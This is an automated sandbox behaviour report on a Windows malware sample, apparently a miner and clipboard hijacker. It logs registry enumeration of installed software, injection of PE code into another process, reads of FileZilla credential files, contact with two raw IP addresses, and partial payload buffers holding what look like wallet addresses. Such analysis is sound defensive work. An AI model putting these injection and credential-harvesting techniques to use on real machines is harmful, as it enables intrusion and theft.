RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: UnINISafeWeb base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: UnINISafeWeb6 base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb6	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: WIC base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {1CBD185A-9CB3-4f30-B7E4-75CC551455F9}_is1 base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1CBD185A-9CB3-4f30-B7E4-75CC551455F9}_is1	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {1F1C2DFC-2D24-3E06-BCB8-725134ADF989} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {5BEFEB79-2B4D-4EEE-9979-AFDE0A20FADE}_is1 base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5BEFEB79-2B4D-4EEE-9979-AFDE0A20FADE}_is1	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {8941A397-4065-4F41-92CE-0EB610846EED}_is1 base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{8941A397-4065-4F41-92CE-0EB610846EED}_is1	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-0011-0000-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-0015-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-0016-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-0018-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-0019-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-001A-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-001B-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-001F-0409-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-001F-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-0028-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-002C-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-0044-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-006E-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-00A1-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {90140000-00BA-0412-0000-0000000FF1CE} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\AD92.bat C:\Users\test22\AppData\Local\Temp\mine.exe"
cmdline	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\AF57.bat C:\Users\test22\AppData\Local\Temp\clip.exe"

Communicates with host for which no DNS query was performed (2 events)

host	45.137.190.166
host	95.217.159.87

Creates an Alternate Data Stream (ADS) (4 events)

file	C:\Users\test22\AppData\Local\Temp\2741\call:extd
file	C:\Users\test22\AppData\Local\Temp\goto:eof
file	C:\Users\test22\AppData\Local\Temp\call:extd
file	C:\Users\test22\AppData\Local\Temp\2741\goto:eof

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2472 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001b8	1	0	0

Deletes executed files from disk (2 events)

file	C:\Users\test22\AppData\Local\Temp\AD71.tmp
file	C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: MZÿÿ¸@Àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁÓw¯ÏÓw¯ÏÓw¯Ï®ÎÖw¯ÏÓw®ÏÙw¯ÏJ¦ÎÖw¯ÏJÎÒw¯ÏRichÓw¯ÏPEL¡Æî`àI @P@Ø)(@ìì(8 .textá `.rdatal @@.dataL0@À.relocì@ @B base_address: 0x00400000 process_identifier: 2472 process_handle: 0x000001b8	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: (:HPG2A/CLP/05/RYS1KCU1upyTnLHbVXCw4CuQvkxFwwMU6eb243DBpxVQ1kdYoJbWwux2Bfz54BfMB5Z2CQ4bc1qq3e09ltqvuzg903dxs7qhhajkel95rzwu4f2y2LaMw5ctk956V3hrtqfco6EzYzWioaGtQRrMPeYRpxQTaWpxt6RuXwqtf3T3FzWFBfbP2ltc1qwjd79y7pk34qunyk8zpz3dllekd7x54pvemhaa0x1c75A4Abe39e8F2984a1c66A898BF7E0b5c3E7E100000L0000T00MON00000000000000000000000LaMw5ctk956V3hrtqfco6EzYzWioaGtQRr00000000000000W000000084gR9n7jyYwQjW3ccMXuB1MpQaNMJ3AsKUzxDTaK9eWr2hch4ZqF18aAfCxVWQiF8G8NSL33xksEL98WFhLgXPLjQNFpwDsD7G1qQZYtFg4tJxtGRpZTMP5id2zd8sfeCaddr1q9xxn652n0wh0pk3h6guecvh6pxrkgp06rlm80tvsxpqkzqh0zxr9yhqkaawf34l8k8w0cdac0k6cljggt9jtftwmz3q8826j9Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPEZ1KCU1upyTnLHbVXCw4CuQvkxFwwMU6eb24t1YyT26xv4ZAHWTxqqHUoWcW9NhZ7SQoYMjbnb1g9wjgxzzgksqmyfsnppeqgr8yj66zwj8ld90mjkernel32.dllLoadLibraryWShlwapi.dllntdll.dllShell32.dllOle32.dllUser32.dllGetProcAddressGetModuleFileNameWCreateDirectoryWGlobalAllocGlobalFreeGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCbPrintfWmemsetwmemsetmemcpyOpenClipboardGetClipboardDataEmptyClipboardSetClipboardDataCloseClipboard @ #@`"@($@&@¸%@°!@h!@à#@8 @È @ @p%@ø$@"@ !@¡Æî` ´$)$¡Æî`GCTLá.text$mn .idata$5 .rdata$)´.rdata$zzzdbgØ).idata$2ì).idata$3.idata$4T.idata$60L.bss^* (:HP*ÄLoadLibraryW®GetProcAddress^ExitProcess}Sleep4GlobalFreeKERNEL32.dll base_address: 0x00402000 process_identifier: 2472 process_handle: 0x000001b8	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: Ä0 0 0&0.030:0C0H0Q0V0^0c0k0p0y0~00000¤0«0°0¶0¼0Á0Ç0Í0Ò0Ø0Þ0ã0é0ï0ô0ú0111111%1*10161;1A1G1L1S1X1_1d1k1s1z1111111£1¨1®1´1¹1À1È1Ï1×1Þ1ã1ê1ï1ö1û1222222#2)2.242:2?2E2K2R2Û2í2þ233$3=3P3h333¢3¯3»3È3á3í34%424K4Z4444¸4Ê4Ø4å4ò455'5<5J5W5d5p5}55¢5Õ5â5ï56!6:6S6l666·6Ð6Ü67(747V7c7p777¥7±7Ð7Ý7ê7ù788.8J8W8d8s888º8Å8Ì8Ö8Þ8è8ñ8÷8þ89 9-9:9@9X9b9h9w99¥9 :?:h::::ª:a;n;; ;Õ;<3<±<Ê<Ö<5=B=O=\=q=Ð=Ý=ê=÷=>ª>·>Ä>Ñ> (¬8°8´8¸8¼8À8Ä8È8Ì8Ð8Ô8Ø8Ü8à8ä8è8 base_address: 0x00404000 process_identifier: 2472 process_handle: 0x000001b8	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2472 process_handle: 0x000001b8	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: MZÿÿ¸@Àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁÓw¯ÏÓw¯ÏÓw¯Ï®ÎÖw¯ÏÓw®ÏÙw¯ÏJ¦ÎÖw¯ÏJÎÒw¯ÏRichÓw¯ÏPEL¡Æî`àI @P@Ø)(@ìì(8 .textá `.rdatal @@.dataL0@À.relocì@ @B base_address: 0x00400000 process_identifier: 2472 process_handle: 0x000001b8	1	1	0

Collects information about installed applications (40 events)

Time & API	Arguments	Status
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: MarkAny Inc. e-PageSafer V2.5 NoAX ( Basic )_2.5.1.18 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ePageSafer\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: TouchEn nxKey with E2E for 32bit regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\TouchEn nxKey\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: INISafeWeb 5.0 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: INISafeWeb 6.0 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb6\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Delfino G3 (x86) version 3.6.6.5 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1CBD185A-9CB3-4f30-B7E4-75CC551455F9}_is1\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: G2BRUN regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5BEFEB79-2B4D-4EEE-9979-AFDE0A20FADE}_is1\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: WIZVERA Process Manager 1,0,5,4 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{8941A397-4065-4F41-92CE-0EB610846EED}_is1\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 31, 2021, 1:26 p.m.	key_handle: 0x00000204 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
